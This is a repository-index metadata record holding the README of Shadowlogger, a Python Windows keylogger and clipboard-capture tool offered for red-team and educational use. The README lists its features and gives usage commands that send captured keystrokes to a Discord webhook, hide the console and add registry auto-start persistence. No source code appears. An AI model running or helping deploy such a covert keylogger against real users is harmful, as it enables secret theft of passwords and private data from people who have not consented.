{"id":31762364,"url":"https://github.com/syedsharjeelshah/shadowlogger","last_synced_at":"2026-05-18T10:36:14.032Z","repository":{"id":306582847,"uuid":"1026664389","full_name":"syedsharjeelshah/Shadowlogger","owner":"syedsharjeelshah","description":"Shadowlogger is a lightweight, Python-based Windows keylogger and clipboard capture tool developed for authorized Red Team simulations, cybersecurity research, and educational purposes only.","archived":false,"fork":false,"pushed_at":"2025-07-26T12:30:44.000Z","size":10,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-07-26T16:41:31.517Z","etag":null,"topics":["cybersecurity","ethical-hacking","infosec","keylogger","open-source-project","python","redteam","security-toolset","windows","windows-10"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/syedsharjeelshah.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2025-07-26T10:56:56.000Z","updated_at":"2025-07-26T12:30:48.000Z","dependencies_parsed_at":"2025-07-26T16:41:34.885Z","dependency_job_id":"e552a80a-64bf-49fa-913f-411a65312f4d","html_url":"https://github.com/syedsharjeelshah/Shadowlogger","commit_stats":null,"previous_names":["syedsharjeelshah/shadowlogger"],"tags_count":null,"template":false,"template_full_name":null,"purl":"pkg:github/syedsharjeelshah/Shadowlogger","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/syedsharjeelshah%2FShadowlogger","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/syedsharjeelshah%2FShadowlogger/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/syedsharjeelshah%2FShadowlogger/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/syedsharjeelshah%2FShadowlogger/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/syedsharjeelshah","download_url":"https://codeload.github.com/syedsharjeelshah/Shadowlogger/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/syedsharjeelshah%2FShadowlogger/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":279002120,"owners_count":26083307,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-10-09T02:00:07.460Z","response_time":59,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cybersecurity","ethical-hacking","infosec","keylogger","open-source-project","python","redteam","security-toolset","windows","windows-10"],"created_at":"2025-10-09T22:18:19.488Z","updated_at":"2025-10-09T22:18:29.374Z","avatar_url":"https://github.com/syedsharjeelshah.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# 🕵️ Shadowlogger\n\n**Shadowlogger** is a lightweight, Python-based Windows keylogger and clipboard capture tool developed for **authorized Red Team simulations**, **cybersecurity research**, and **educational purposes only**.\n\n\u003e ⚠️ This tool is strictly for use in environments where you have **explicit permission**. Unauthorized usage is illegal and unethical.\n\n---\n\n## ✨ Features\n\n- ✅ Logs keystrokes (including special keys like Enter, Shift, etc.)\n- 📋 Captures clipboard data on `Ctrl + V` paste events\n- 🌐 Optional exfiltration to a **user-supplied Discord webhook**\n- 🛠️ Optional persistence via Windows registry (auto-run at startup)\n- 👻 Optional stealth mode (hides the console window)\n- 🔧 Fully configurable via command-line arguments (no hardcoded webhooks)\n- 📦 Easy to extend, open-source\n\n\n## ⚙️ Requirements\n\n- Python 3.7+ (Windows only)\n- Install dependencies with:\n\n```bash\npip install -r requirements.txt\n````\n\n---\n\n## 🚀 Usage\n\n### 🔹 Basic Logging (no exfiltration)\n\n```bash\npython Shadowlogger.py\n```\n\n### 🔹 Remote Logging (Discord webhook)\n\n```bash\npython Shadowlogger.py --webhook https://discord.com/api/webhooks/your_webhook_url\n```\n\n### 🔹 With Stealth (no console window)\n\n```bash\npython Shadowlogger.py --webhook https://discord.com/api/webhooks/your_webhook_url --stealth\n```\n\n### 🔹 With Persistence (auto-start on boot)\n\n```bash\npython Shadowlogger.py --webhook https://discord.com/api/webhooks/your_webhook_url --stealth --persist\n```\n\n---\n\n## 📤 What Gets Logged?\n\n* Keystrokes → Saved in `syscache.log`\n* Clipboard data → Saved in `clipdata.log`\n* If webhook is passed, logs are sent every 5 minutes to your specified endpoint\n\n---\n\n## 🧠 Educational Use Cases\n\n* Red Team simulation labs\n* Malware behavior analysis\n* Blue Team defense training\n* Security awareness demos\n\n---\n\n## ❗️ Legal Disclaimer\n\nThis project is provided for:\n\n* ✅ Educational purposes\n* ✅ Ethical hacking training\n* ✅ Authorized Red Teaming only\n\n\u003e ❌ The author does **not condone** illegal activity and is **not responsible** for misuse of this software.\n\n---\n\n## 🙌 Credits\n\nDeveloped by \\[Syed Sharjeel Zaidi]\n\nGitHub:(https://github.com/syedsharjeelshah)\n...\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsyedsharjeelshah%2Fshadowlogger","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fsyedsharjeelshah%2Fshadowlogger","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fsyedsharjeelshah%2Fshadowlogger/lists"}